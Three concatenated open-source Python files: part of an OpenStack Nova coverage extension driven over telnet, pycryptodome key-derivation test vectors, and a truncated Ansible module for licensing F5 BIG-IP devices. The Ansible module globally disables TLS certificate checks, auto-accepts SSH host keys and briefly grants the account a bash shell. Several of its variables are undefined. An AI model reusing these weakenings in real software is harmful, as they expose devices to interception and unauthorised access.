tn.write("print 'finished'\n")
tn.expect([re.compile('finished')])
def _check_coverage(self):
try:
self.coverInst.stop()
self.coverInst.save()
except AssertionError:
return True
return False
def _stop_coverage(self, req):
for service in self.services:
self._stop_coverage_telnet(service['telnet'])
if self._check_coverage():
msg = _("Coverage not running")
raise exc.HTTPNotFound(explanation=msg)
return {'path': self.data_path}
def _report_coverage_telnet(self, tn, path, xml=False):
if xml:
execute = str("coverInst.xml_report(outfile='%s')\n" % path)
tn.write(execute)
tn.write("print 'finished'\n")
tn.expect([re.compile('finished')])
else:
execute = str("output = open('%s', 'w')\n" % path)
tn.write(execute)
tn.write("coverInst.report(file=output)\n")
tn.write("output.close()\n")
tn.write("print 'finished'\n")
tn.expect([re.compile('finished')])
tn.close()
def _report_coverage(self, req, body):
self._stop_coverage(req)
xml = False
html = False
path = None
body = body['report']
if 'file' in body.keys():
path = body['file']
if path != os.path.basename(path):
msg = _("Invalid path")
raise exc.HTTPBadRequest(explanation=msg)
path = os.path.join(self.data_path, path)
else:
msg = _("No path given for report file")
raise exc.HTTPBadRequest(explanation=msg)
if 'xml' in body.keys():
xml = body['xml']
elif 'html' in body.keys():
if not self.combine:
msg = _("You can't use html reports without combining")
raise exc.HTTPBadRequest(explanation=msg)
html = body['html']
if self.combine:
self.coverInst.combine()
if xml:
self.coverInst.xml_report(outfile=path)
elif html:
if os.path.isdir(path):
msg = _("Directory conflict: %s already exists")
raise exc.HTTPBadRequest(explanation=msg)
self.coverInst.html_report(directory=path)
else:
output = open(path, 'w')
self.coverInst.report(file=output)
output.close()
for service in self.services:
service['telnet'].close()
else:
if xml:
apipath = path + '.api'
self.coverInst.xml_report(outfile=apipath)
for service in self.services:
self._report_coverage_telnet(service['telnet'],
path + '.%s'
% service['service'],
xml=True)
else:
output = open(path + '.api', 'w')
self.coverInst.report(file=output)
for service in self.services:
self._report_coverage_telnet(service['telnet'],
path + '.%s' % service['service'])
output.close()
return {'path': path}
def action(self, req, body):
_actions = {
'start': self._start_coverage,
'stop': self._stop_coverage,
'report': self._report_coverage,
}
authorize(req.environ['nova.context'])
if not self.coverInst:
msg = _("Python coverage module is not installed.")
raise exc.HTTPServiceUnavailable(explanation=msg)
for action, data in body.iteritems():
if action == 'stop':
return _actions[action](req)
elif action == 'report' or action == 'start':
return _actions[action](req, body)
else:
msg = _("Coverage doesn't have %s action") % action
raise exc.HTTPBadRequest(explanation=msg)
raise exc.HTTPBadRequest(explanation=_("Invalid request body"))
class Coverage_ext(extensions.ExtensionDescriptor):
"""Enable Nova Coverage."""
name = "Coverage"
alias = "os-coverage"
namespace = ("http://docs.openstack.org/compute/ext/"
"coverage/api/v2")
updated = "2012-10-15T00:00:00+00:00"
def get_resources(self):
resources = []
res = extensions.ResourceExtension('os-coverage',
controller=CoverageController(),
collection_actions={"action": "POST"})
resources.append(res)
return resources
|
|
# -*- coding: utf-8 -*-
#
# SelfTest/Protocol/test_KDF.py: Self-test for key derivation functions
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
import unittest
from binascii import unhexlify
from Cryptodome.Util.py3compat import *
from Cryptodome.SelfTest.st_common import list_test_cases
from Cryptodome.Hash import SHA1, HMAC, SHA256
from Cryptodome.Cipher import AES, DES3
from Cryptodome.Protocol.KDF import PBKDF1, PBKDF2, _S2V, HKDF, scrypt
def t2b(t):
if t is None:
return None
t2 = t.replace(" ", "").replace("\n", "")
return unhexlify(b(t2))
class TestVector(object):
pass
class PBKDF1_Tests(unittest.TestCase):
# List of tuples with test data.
# Each tuple is made up by:
# Item #0: a pass phrase
# Item #1: salt (8 bytes encoded in hex)
# Item #2: output key length
# Item #3: iterations to use
# Item #4: expected result (encoded in hex)
_testData = (
# From http://www.di-mgt.com.au/cryptoKDFs.html#examplespbkdf
("password","78578E5A5D63CB06",16,1000,"DC19847E05C64D2FAF10EBFB4A3D2A20"),
)
def test1(self):
v = self._testData[0]
res = PBKDF1(v[0], t2b(v[1]), v[2], v[3], SHA1)
self.assertEqual(res, t2b(v[4]))
class PBKDF2_Tests(unittest.TestCase):
# List of tuples with test data.
# Each tuple is made up by:
# Item #0: a pass phrase
# Item #1: salt (encoded in hex)
# Item #2: output key length
# Item #3: iterations to use
# Item #4: expected result (encoded in hex)
_testData = (
# From http://www.di-mgt.com.au/cryptoKDFs.html#examplespbkdf
("password","78578E5A5D63CB06",24,2048,"BFDE6BE94DF7E11DD409BCE20A0255EC327CB936FFE93643"),
# From RFC 6050
("password","73616c74", 20, 1, "0c60c80f961f0e71f3a9b524af6012062fe037a6"),
("password","73616c74", 20, 2, "ea6c014dc72d6f8ccd1ed92ace1d41f0d8de8957"),
("password","73616c74", 20, 4096, "4b007901b765489abead49d926f721d065a429c1"),
("passwordPASSWORDpassword","73616c7453414c5473616c7453414c5473616c7453414c5473616c7453414c5473616c74",
25, 4096, "3d2eec4fe41c849b80c8d83662c0e44a8b291a964cf2f07038"),
( 'pass\x00word',"7361006c74",16,4096, "56fa6aa75548099dcc37d7f03425e0c3"),
)
def test1(self):
# Test only for HMAC-SHA1 as PRF
def prf(p,s):
return HMAC.new(p,s,SHA1).digest()
for i in xrange(len(self._testData)):
v = self._testData[i]
res = PBKDF2(v[0], t2b(v[1]), v[2], v[3])
res2 = PBKDF2(v[0], t2b(v[1]), v[2], v[3], prf)
self.assertEqual(res, t2b(v[4]))
self.assertEqual(res, res2)
def test2(self):
"""From draft-josefsson-scrypt-kdf-01, Chapter 10"""
output_1 = t2b("""
55 ac 04 6e 56 e3 08 9f ec 16 91 c2 25 44 b6 05
f9 41 85 21 6d de 04 65 e6 8b 9d 57 c2 0d ac bc
49 ca 9c cc f1 79 b6 45 99 16 64 b3 9d 77 ef 31
7c 71 b8 45 b1 e3 0b d5 09 11 20 41 d3 a1 97 83
""")
output_2 = t2b("""
4d dc d8 f6 0b 98 be 21 83 0c ee 5e f2 27 01 f9
64 1a 44 18 d0 4c 04 14 ae ff 08 87 6b 34 ab 56
a1 d4 25 a1 22 58 33 54 9a db 84 1b 51 c9 b3 17
6a 27 2b de bb a1 d0 78 47 8f 62 b3 97 f3 3c 8d
""")
prf_hmac_sha256 = lambda p, s: HMAC.new(p, s, SHA256).digest()
output = PBKDF2(b("passwd"), b("salt"), 64, 1, prf=prf_hmac_sha256)
self.assertEqual(output, output_1)
output = PBKDF2(b("Password"), b("NaCl"), 64, 80000, prf=prf_hmac_sha256)
self.assertEqual(output, output_2)
class S2V_Tests(unittest.TestCase):
# Sequence of test vectors.
# Each test vector is made up by:
# Item #0: a tuple of strings
# Item #1: an AES key
# Item #2: the result
# Item #3: the cipher module S2V is based on
# Everything is hex encoded
_testData = [
# RFC5297, A.1
(
( '101112131415161718191a1b1c1d1e1f2021222324252627',
'112233445566778899aabbccddee' ),
'fffefdfcfbfaf9f8f7f6f5f4f3f2f1f0',
'85632d07c6e8f37f950acd320a2ecc93',
AES
),
# RFC5297, A.2
(
( '00112233445566778899aabbccddeeffdeaddadadeaddadaffeeddcc'+
'bbaa99887766554433221100',
'102030405060708090a0',
'09f911029d74e35bd84156c5635688c0',
'7468697320697320736f6d6520706c61'+
'696e7465787420746f20656e63727970'+
'74207573696e67205349562d414553'),
'7f7e7d7c7b7a79787776757473727170',
'7bdb6e3b432667eb06f4d14bff2fbd0f',
AES
),
]
def test1(self):
"""Verify correctness of test vector"""
for tv in self._testData:
s2v = _S2V.new(t2b(tv[1]), tv[3])
for s in tv[0]:
s2v.update(t2b(s))
result = s2v.derive()
self.assertEqual(result, t2b(tv[2]))
def test2(self):
"""Verify that no more than 127(AES) and 63(TDES)
components are accepted."""
key = bchr(0) * 8 + bchr(255) * 8
for module in (AES, DES3):
s2v = _S2V.new(key, module)
max_comps = module.block_size*8-1
for i in xrange(max_comps):
s2v.update(b("XX"))
self.assertRaises(TypeError, s2v.update, b("YY"))
class HKDF_Tests(unittest.TestCase):
# Test vectors from RFC5869, Appendix A
# Each tuple is made up by:
# Item #0: hash module
# Item #1: secret
# Item #2: salt
# Item #3: context
# Item #4: expected result
_test_vector = (
(
SHA256,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
"000102030405060708090a0b0c",
"f0f1f2f3f4f5f6f7f8f9",
42,
"3cb25f25faacd57a90434f64d0362f2a" +
"2d2d0a90cf1a5a4c5db02d56ecc4c5bf" +
"34007208d5b887185865"
),
(
SHA256,
"000102030405060708090a0b0c0d0e0f" +
"101112131415161718191a1b1c1d1e1f" +
"202122232425262728292a2b2c2d2e2f" +
"303132333435363738393a3b3c3d3e3f" +
"404142434445464748494a4b4c4d4e4f",
"606162636465666768696a6b6c6d6e6f" +
"707172737475767778797a7b7c7d7e7f" +
"808182838485868788898a8b8c8d8e8f" +
"909192939495969798999a9b9c9d9e9f" +
"a0a1a2a3a4a5a6a7a8a9aaabacadaeaf",
"b0b1b2b3b4b5b6b7b8b9babbbcbdbebf" +
"c0c1c2c3c4c5c6c7c8c9cacbcccdcecf" +
"d0d1d2d3d4d5d6d7d8d9dadbdcdddedf" +
"e0e1e2e3e4e5e6e7e8e9eaebecedeeef" +
"f0f1f2f3f4f5f6f7f8f9fafbfcfdfeff",
82,
"b11e398dc80327a1c8e7f78c596a4934" +
"4f012eda2d4efad8a050cc4c19afa97c" +
"59045a99cac7827271cb41c65e590e09" +
"da3275600c2f09b8367793a9aca3db71" +
"cc30c58179ec3e87c14c01d5c1f3434f" +
"1d87"
),
(
SHA256,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
None,
None,
42,
"8da4e775a563c18f715f802a063c5a31" +
"b8a11f5c5ee1879ec3454e5f3c738d2d" +
"9d201395faa4b61a96c8"
),
(
SHA1,
"0b0b0b0b0b0b0b0b0b0b0b",
"000102030405060708090a0b0c",
"f0f1f2f3f4f5f6f7f8f9",
42,
"085a01ea1b10f36933068b56efa5ad81" +
"a4f14b822f5b091568a9cdd4f155fda2" +
"c22e422478d305f3f896"
),
(
SHA1,
"000102030405060708090a0b0c0d0e0f" +
"101112131415161718191a1b1c1d1e1f" +
"202122232425262728292a2b2c2d2e2f" +
"303132333435363738393a3b3c3d3e3f" +
"404142434445464748494a4b4c4d4e4f",
"606162636465666768696a6b6c6d6e6f" +
"707172737475767778797a7b7c7d7e7f" +
"808182838485868788898a8b8c8d8e8f" +
"909192939495969798999a9b9c9d9e9f" +
"a0a1a2a3a4a5a6a7a8a9aaabacadaeaf",
"b0b1b2b3b4b5b6b7b8b9babbbcbdbebf" +
"c0c1c2c3c4c5c6c7c8c9cacbcccdcecf" +
"d0d1d2d3d4d5d6d7d8d9dadbdcdddedf" +
"e0e1e2e3e4e5e6e7e8e9eaebecedeeef" +
"f0f1f2f3f4f5f6f7f8f9fafbfcfdfeff",
82,
"0bd770a74d1160f7c9f12cd5912a06eb" +
"ff6adcae899d92191fe4305673ba2ffe" +
"8fa3f1a4e5ad79f3f334b3b202b2173c" +
"486ea37ce3d397ed034c7f9dfeb15c5e" +
"927336d0441f4c4300e2cff0d0900b52" +
"d3b4"
),
(
SHA1,
"0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b0b",
"",
"",
42,
"0ac1af7002b3d761d1e55298da9d0506" +
"b9ae52057220a306e07b6b87e8df21d0" +
"ea00033de03984d34918"
),
(
SHA1,
"0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c",
None,
"",
42,
"2c91117204d745f3500d636a62f64f0a" +
"b3bae548aa53d423b0d1f27ebba6f5e5" +
"673a081d70cce7acfc48"
)
)
def test1(self):
for tv in self._test_vector:
secret, salt, info, exp = [ t2b(tv[x]) for x in (1,2,3,5) ]
key_len, hashmod = [ tv[x] for x in (4,0) ]
output = HKDF(secret, key_len, salt, hashmod, 1, info)
self.assertEqual(output, exp)
def test2(self):
ref = HKDF(b("XXXXXX"), 12, b("YYYY"), SHA1)
# Same output, but this time split over 2 keys
key1, key2 = HKDF(b("XXXXXX"), 6, b("YYYY"), SHA1, 2)
self.assertEqual((ref[:6], ref[6:]), (key1, key2))
# Same output, but this time split over 3 keys
key1, key2, key3 = HKDF(b("XXXXXX"), 4, b("YYYY"), SHA1, 3)
self.assertEqual((ref[:4], ref[4:8], ref[8:]), (key1, key2, key3))
class scrypt_Tests(unittest.TestCase):
# Test vectors taken from
# http://tools.ietf.org/html/draft-josefsson-scrypt-kdf-00
data = (
(
"",
"",
16, # 2K
1,
1,
"""
77 d6 57 62 38 65 7b 20 3b 19 ca 42 c1 8a 04 97
f1 6b 48 44 e3 07 4a e8 df df fa 3f ed e2 14 42
fc d0 06 9d ed 09 48 f8 32 6a 75 3a 0f c8 1f 17
e8 d3 e0 fb 2e 0d 36 28 cf 35 e2 0c 38 d1 89 06
"""
),
(
"password",
"NaCl",
1024, # 1M
8,
16,
"""
fd ba be 1c 9d 34 72 00 78 56 e7 19 0d 01 e9 fe
7c 6a d7 cb c8 23 78 30 e7 73 76 63 4b 37 31 62
2e af 30 d9 2e 22 a3 88 6f f1 09 27 9d 98 30 da
c7 27 af b9 4a 83 ee 6d 83 60 cb df a2 cc 06 40
"""
),
(
"pleaseletmein",
"SodiumChloride",
16384, # 16M
8,
1,
"""
70 23 bd cb 3a fd 73 48 46 1c 06 cd 81 fd 38 eb
fd a8 fb ba 90 4f 8e 3e a9 b5 43 f6 54 5d a1 f2
d5 43 29 55 61 3f 0f cf 62 d4 97 05 24 2a 9a f9
e6 1e 85 dc 0d 65 1e 40 df cf 01 7b 45 57 58 87
"""
),
(
"pleaseletmein",
"SodiumChloride",
1048576, # 1G
8,
1,
"""
21 01 cb 9b 6a 51 1a ae ad db be 09 cf 70 f8 81
ec 56 8d 57 4a 2f fd 4d ab e5 ee 98 20 ad aa 47
8e 56 fd 8f 4b a5 d0 9f fa 1c 6d 92 7c 40 f4 c3
37 30 40 49 e8 a9 52 fb cb f4 5c 6f a7 7a 41 a4
"""
),
)
def setUp(self):
new_test_vectors = []
for tv in self.data:
new_tv = TestVector()
new_tv.P = b(tv[0])
new_tv.S = b(tv[1])
new_tv.N = tv[2]
new_tv.r = tv[3]
new_tv.p = tv[4]
new_tv.output = t2b(tv[5])
new_tv.dkLen = len(new_tv.output)
new_test_vectors.append(new_tv)
self.data = new_test_vectors
def _test1(self):
b_input = t2b("""
f7 ce 0b 65 3d 2d 72 a4 10 8c f5 ab e9 12 ff dd
77 76 16 db bb 27 a7 0e 82 04 f3 ae 2d 0f 6f ad
89 f6 8f 48 11 d1 e8 7b cc 3b d7 40 0a 9f fd 29
09 4f 01 84 63 95 74 f3 9a e5 a1 31 52 17 bc d7
89 49 91 44 72 13 bb 22 6c 25 b5 4d a8 63 70 fb
cd 98 43 80 37 46 66 bb 8f fc b5 bf 40 c2 54 b0
67 d2 7c 51 ce 4a d5 fe d8 29 c9 0b 50 5a 57 1b
7f 4d 1c ad 6a 52 3c da 77 0e 67 bc ea af 7e 89
""")
b_output = t2b("""
79 cc c1 93 62 9d eb ca 04 7f 0b 70 60 4b f6 b6
2c e3 dd 4a 96 26 e3 55 fa fc 61 98 e6 ea 2b 46
d5 84 13 67 3b 99 b0 29 d6 65 c3 57 60 1f b4 26
a0 b2 f4 bb a2 00 ee 9f 0a 43 d1 9b 57 1a 9c 71
ef 11 42 e6 5d 5a 26 6f dd ca 83 2c e5 9f aa 7c
ac 0b 9c f1 be 2b ff ca 30 0d 01 ee 38 76 19 c4
ae 12 fd 44 38 f2 03 a0 e4 e1 c4 7e c3 14 86 1f
4e 90 87 cb 33 39 6a 68 73 e8 f9 d2 53 9a 4b 8e
""")
from Cryptodome.Protocol.KDF import _scryptROMix
output = _scryptROMix(b_input, 16)
self.assertEqual(output, b_output)
def test2(self):
for tv in self.data:
# TODO: add runtime flag to enable test vectors
# with humongous memory usage
if tv.N > 100000:
continue
output = scrypt(tv.P, tv.S, tv.dkLen, tv.N, tv.r, tv.p)
self.assertEqual(output, tv.output)
def test3(self):
ref = scrypt(b("password"), b("salt"), 12, 16, 1, 1)
# Same output, but this time split over 2 keys
key1, key2 = scrypt(b("password"), b("salt"), 6, 16, 1, 1, 2)
self.assertEqual((ref[:6], ref[6:]), (key1, key2))
# Same output, but this time split over 3 keys
key1, key2, key3 = scrypt(b("password"), b("salt"), 4, 16, 1, 1, 3)
self.assertEqual((ref[:4], ref[4:8], ref[8:]), (key1, key2, key3))
def get_tests(config={}):
tests = []
tests += list_test_cases(PBKDF1_Tests)
tests += list_test_cases(PBKDF2_Tests)
tests += list_test_cases(S2V_Tests)
tests += list_test_cases(HKDF_Tests)
tests += list_test_cases(scrypt_Tests)
return tests
if __name__ == '__main__':
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: bigip_license
short_description: Manage license installation and activation on BIG-IP devices
description:
- Manage license installation and activation on BIG-IP devices
version_added: "2.2"
options:
dossier_file:
description:
- Path to file containing kernel dossier for your system
required: false
server:
description:
- BIG-IP host to connect to
required: true
key:
description:
- The registration key to use to license the BIG-IP. This is required
if the C(state) is equal to C(present) or C(latest)
required: false
license_file:
description:
- Path to file containing the license to use
required: false
license_options:
description:
- Dictionary of options to use when creating the license
required: false
password:
description:
- The password of the user used to authenticate to the BIG-IP
required: true
state:
description:
- The state of the license on the system. When C(present), only guarantees
that a license is there. When C(latest) ensures that the license is always
valid. When C(absent) removes the license on the system. C(latest) is
most useful internally. When using C(absent), the account accessing the
device must be configured to use the advanced shell instead of Appliance
Mode.
required: false
default: present
choices:
- absent
- latest
- present
wsdl:
description:
- WSDL file to use if you're receiving errors when downloading the WSDL
file at run-time from the licensing servers
required: false
default: None
user:
description:
- The username used when connecting to the BIG-IP
required: true
aliases:
- username
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be
used on personally controlled sites using self-signed certificates.
required: false
default: true
notes:
- Requires the suds Python package on the host. This is as easy as
pip install suds
- Requires the bigsuds Python package on the host. This is as easy as
pip install bigsuds
- Requires the paramiko Python package on the host if using the C(state)
C(absent). This is as easy as pip install paramiko
- Requires the requests Python package on the host if using the C(state)
C(absent). This is as easy as pip install paramiko
requirements:
- bigsuds
- requests
- suds
- paramiko
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = '''
- name: License BIG-IP using default license options
bigip_license:
server: "big-ip.domain.org"
username: "admin"
password: "MyPassword123"
key: "XXXXX-XXXXX-XXXXX-XXXXX-XXXXXXX"
delegate_to: localhost
- name: License BIG-IP, specifying license options
bigip_license:
server: "big-ip.domain.org"
key: "XXXXX-XXXXX-XXXXX-XXXXX-XXXXXXX"
username: "admin"
password: "MyPassword123"
license_options:
email: '[email protected]'
firstname: 'Joe'
lastname: 'User'
company: 'My Place'
phone: '630-555-1212'
jobtitle: 'Systems Administrator'
address: '207 N Rodeo Dr'
city: 'Beverly Hills'
state: 'CA'
postalcode: '90210'
country: 'US'
delegate_to: localhost
- name: Remove the license from the system
bigip_license:
server: "big-ip.domain.org"
username: "admin"
password: "MyPassword123"
state: "absent"
delegate_to: localhost
- name: Update the current license of the BIG-IP
bigip_license:
server: "big-ip.domain.org"
username: "admin"
password: "MyPassword123"
key: "XXXXX-XXXXX-XXXXX-XXXXX-XXXXXXX"
state: "latest"
delegate_to: localhost
'''
import base64
import re
import socket
import ssl
import suds
import time
from xml.sax._exceptions import SAXParseException
try:
import paramiko
except ImportError:
paramiko_found = False
else:
paramiko_found = True
LIC_EXTERNAL = 'activate.f5.com'
LIC_INTERNAL = 'authem.f5net.com'
def is_production_key(key):
m = re.search("\d", key[1:-1])
if m:
return False
else:
return True
class UnreachableActivationServerError(Exception):
pass
class DossierNotGeneratedError(Exception):
pass
class NoLicenseReturnedError(Exception):
pass
class SSLCertVerifyError(Exception):
pass
class UnprivilegedAccountError(Exception):
pass
class BigIpLicenseCommon(object):
def __init__(self, module):
self.password = module.params.get('password')
self.username = module.params.get('user')
self.hostname = module.params.get('server')
# Holds the SSH connection for paramiko if ensurign the license is absent
self.cli = None
self._validate_certs = module.params.get('validate_certs')
self.client = bigsuds.BIGIP(
hostname=self.hostname,
username=self.username,
password=self.password,
debug=True
)
def test_license_server(self):
server = self.license_server
wsdl = self.wsdl
if wsdl:
url = 'file://%s' % wsdl
else:
url = 'https://%s/license/services/urn:com.f5.license.v5b.ActivationService?wsdl' % server
try:
if server == LIC_INTERNAL:
if hasattr(ssl, 'SSLContext'):
ssl._create_default_https_context = ssl._create_unverified_context()
# Specifying the location here is required because the URLs in the
# WSDL for activate specify http but the URL we are querying for
# here is https. Something is weird in suds and causes the following
# to be returned
#
# <h1>/license/services/urn:com.f5.license.v5b.ActivationService</h1>
# <p>Hi there, this is an AXIS service!</p>
# <i>Perhaps there will be a form for invoking the service here...</i>
#
if self._validate_certs:
client = suds.client.Client(url=url, location=url, timeout=10)
else:
client = suds.client.Client(url, timeout=10)
result = client.service.ping()
if result:
return True
else:
return False
except SAXParseException:
return False
def get_license_activation_status(self):
"""Returns the license status
This method will return the license activation status of a BIG-IP. The
following status may be returned from this method.
STATE_DISABLED when it is not licensed
STATE_ENABLED when it is licensed
"""
return self.client.Management.LicenseAdministration.get_license_activation_status()
def read_account(self):
self._uri = 'https://%s/mgmt/tm/auth/user/%s' % (self.hostname, self.username)
self._headers = {
'Content-Type': 'application/json'
}
try:
resp = requests.get(self._uri,
auth=(self.username, self.password),
verify=self._validate_certs)
except requests.exceptions.SSLError:
raise SSLCertVerifyError
if resp.status_code != 200:
raise Exception('Failed to query the REST API')
else:
return resp.json()
def appliance_mode(self):
"""Checks for appliance mode
Appliance mode is simply having your shell set to "tmsh". This mode
prevents you from running arbitrary system commands. For this module,
however, we need to ensure that Appliance Mode is not enabled for
the account used to connect to the BIG-IP device.
If it is, we will not be able to reload the license correctly and the
APIs will continue to report the previous status of the license even
after we have removed it from disk
"""
result = self.read_account()
if 'shell' in result and result['shell'] == 'tmsh':
return True
else:
return False
def can_have_advanced_shell(self):
"""Ensure account can use an advanced shell
Only a few types of roles are allowed to use the advanced shell.
Since we need to use this shell when making a license 'absent'
on the system, we need to check to see if the user is assigned a
role that is allowed to have an advanced shell
"""
roles = []
can_have_advanced = ['resource-admin', 'admin']
user_data = self.read_account()
pa = user_data['partitionAccess']
roles = set([p['role'] for p in pa])
found = [x for x in roles if x in can_have_advanced]
if len(found) > 0:
return True
else:
return False
def set_shell(self, shell):
payload = {}
shell = str(shell)
if shell == '/bin/bash':
shell = 'bash'
elif shell == '/sbin/nologin':
shell = 'none'
elif shell == '/usr/bin/tmsh':
shell = 'tmsh'
payload['shell'] = shell
uri = 'https://%s/mgmt/tm/auth/user/%s' % (self.hostname, self.username)
self._headers = {
'Content-Type': 'application/json',
'Connection': 'close'
}
requests.put(uri,
auth=(self.username, self.password),
data=json.dumps(payload),
verify=self._validate_certs)
def absent(self):
"""Removes a license from a device
This method will remove a license completely from a system and reload
the configuration so that it is reporting as removed in the APIs.
Notes about this method:
It detects admin-ness and changes the connecting account's shell
temporarily.
There is no API command that can be used to remove a license.
Therefore, my workaround is to use the SOAP API to delete the file
directly from the server.
This works to remove the license, but the system will not be aware
that the license has been removed. To make the system aware of this
you need to run the 'reloadlic' command from the advanced shell as
there is no way to run an equivalent command from any API.
The advanced shell is only available to two roles.
To negate the need to specify a special account to connect with
in this module, we change the shell of the connecting user to be
the advanced shell. Afterwards we set the shell back to what it
was before we changed it.
There is a small risk that during the time that the shell is exposed
that someone could connect to the system and have interactive access
to the device. Since this module is one that should be used fairly
infrequently in practice, I think the risk to the owner of the device
during this brief period of time is minimal.
This behavior is only needed for the 'absent' state and in future
versions of our products this process may be unnecessary due to
enhancements in the APIs that correctly reload the license status
if it changes through the API
"""
licenses = [
'/config/bigip.license',
'/config/bigiq.license'
]
# Because this account may need to adjust your shell to run the
# 'reloadlic' command, you must be running this module with an
# account that has the privileges necessary to have an advanced
# shell.
#
# Usually this is the 'admin' account. If you do not have the
# required role though, we need to stop further work
if not self.can_have_advanced_shell():
raise UnprivilegedAccountError
# Start by reading in the current shell.
#
# This is being done so that if we need to set the shell to the
# advanced shell, we will know what shell to set the account back
# to after we are done.
user_data = self.read_account()
# There is the possibility that there will be no shell specified
# in the account details. The REST API does not list a shell if
# the console has been deactivated for the account
if 'shell' in user_data:
if user_data['shell'] != 'bash':
self.set_shell('bash')
else:
self.set_shell('bash')
self.cli = paramiko.SSHClient()
if not self._validate_certs:
self.cli.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.cli.connect(self.hostname, username=self.username, password=self.password)
# I am deleting all of the BIG-IP and BIG-IQ licenses so that this
# module can be used by both devices
for license in licenses:
# If the file does not exist, the SOAP client will raise an
# exception. Handle it and move on
try:
self.client.System.ConfigSync.delete_file(license)
except bigsuds.ServerError:
pass
# The reloadlic command is used to refresh the state that is
# reported by the APIs. If this is not done, then the existing
# state reported does not changed from STATE_ENABLED
cmd = "/usr/bin/reloadlic"
stdin, stdout, stderr = self.cli.exec_command(cmd)
self.cli.close()
# reloadlic doesn't actually return anything, and it also doesn't
# correctly report back its status upon failure (for example by
# exiting with return codes greater than zero
#
# So the only way to really know if the license was succesfully
# deleted is to recheck the state of the license
stop_time = time.time() + 60
while True:
status = self.get_license_activation_status()
if status == 'STATE_DISABLED':
break
elif time.time() >= stop_time:
# ensure we do not run forever
break
time.sleep(1)
if 'shell' in user_data:
shell = user_data['shell']
if shell == 'bash':
shell = '/bin/bash'
elif shell == 'none':
shell = '/sbin/nologin'
elif shell == 'tmsh':
shell = '/usr/bin/tmsh'
stop_time = time.time() + 60
while True:
self.set_shell(shell)
time.sleep(5)
resp = self.client.Management.UserManagement.get_login_shell([self.username])
if resp[0] == shell:
break
elif time.time() >= stop_time:
# ensure we do not run forever
break
time.sleep(5)
return True
class BigIpLicenseIControl(BigIpLicenseCommon):
def __init__(self, module):
super(BigIpLicenseIControl, self).__init__(module)
self.eula_file = 'LICENSE.F5'
self.license = None
self.dossier = None
self.license_file = module.params.get('license_file')
self.dossier_file = module.params.get('dossier_file')
self.regkey = module.params.get('key')
self.license_options = {
'eula': '',
'email': '',
'firstname': '',
'lastname': '',
'company': '',
'phone': '',
'jobtitle': '',
'address': '',
'city': '',
'state': '',
'postalcode': '',
'country': ''
}
self.license_server = None
self.wsdl = module.params.get('wsdl')
license_options = module.params.get('license_options')
if license_options:
tmp = dict(self.license_options.items() + license_options.items())
self.license_options = tmp
def get_license(self):
if self.wsdl:
url = 'file://%s' % wsdl
else:
url = 'https://%s/license/services/urn:com.f5.license.v5b.ActivationService?wsdl' % self.license_server
client = suds.client.Client(url=url, location=url)
resp = client.service.getLicense(
self.dossier,
self.license_options['eula'],
self.license_options['email'],
self.license_options['firstname'],
self.license_options['lastname'],
self.license_options['company'],
self.license_options['phone'],
self.license_options['jobtitle'],
self.license_options['address'],
self.license_options['city'],
self.license_options['state'],
self.license_options['postalcode'],
self.license_options['country'],
)
return resp
def get_dossier(self, key):
response = self.client.Management.LicenseAdministration.get_system_dossier(
registration_keys=[key]
)
self.dossier = response
return response
def install_license(self, license):
license = base64.b64encode(license)
self.client.Management.LicenseAdministration.install_license(
license_file_data=license
)
status = self.get_license_activation_status()
if status == 'STATE_ENABLED':
return True
else:
return False
def upload_eula(self, eula):
file_name = '/%s' % self.eula_file
self.client.System.ConfigSync.upload_file(
file_name=file_name,
file_context=dict(
file_data=base64.b64encode(eula),
chain_type='FILE_FIRST_AND_LAST'
)
)
def present(self):
if is_production_key(self.regkey):
license_server = LIC_EXTERNAL
else:
license_server = LIC_INTERNAL
self.license_server = license_server
if self.license_file:
fh = open(license_file)
self.license = fh.read()
fh.close()
if self.dossier_file:
fh = open(dossier_file)
self.dossier = fh.read()
fh.close()
lic_server = self.test_license_server()
if not lic_server and lic_status == 'STATE_DISABLED':
raise UnreachableActivationServerError
if not self.dossier:
self.get_dossier(self.regkey)
if not self.dossier:
raise DossierNotGeneratedError
resp = self.get_license()
if resp.state == "EULA_REQUIRED":
# Extract the eula offered from first try
eula_string = resp.eula
self.license_options['eula'] = eula_string
resp = self.get_license()
# Try again, this time with eula populated
if resp.state == 'LICENSE_RETURNED':
big_license = resp.license
if big_license:
self.upload_eula(resp.eula)
else:
raise NoLicenseReturnedError(resp.fault.faultText)
if self.install_license(big_license):
return True
else:
return False
def main():
changed = False
module = AnsibleModule(
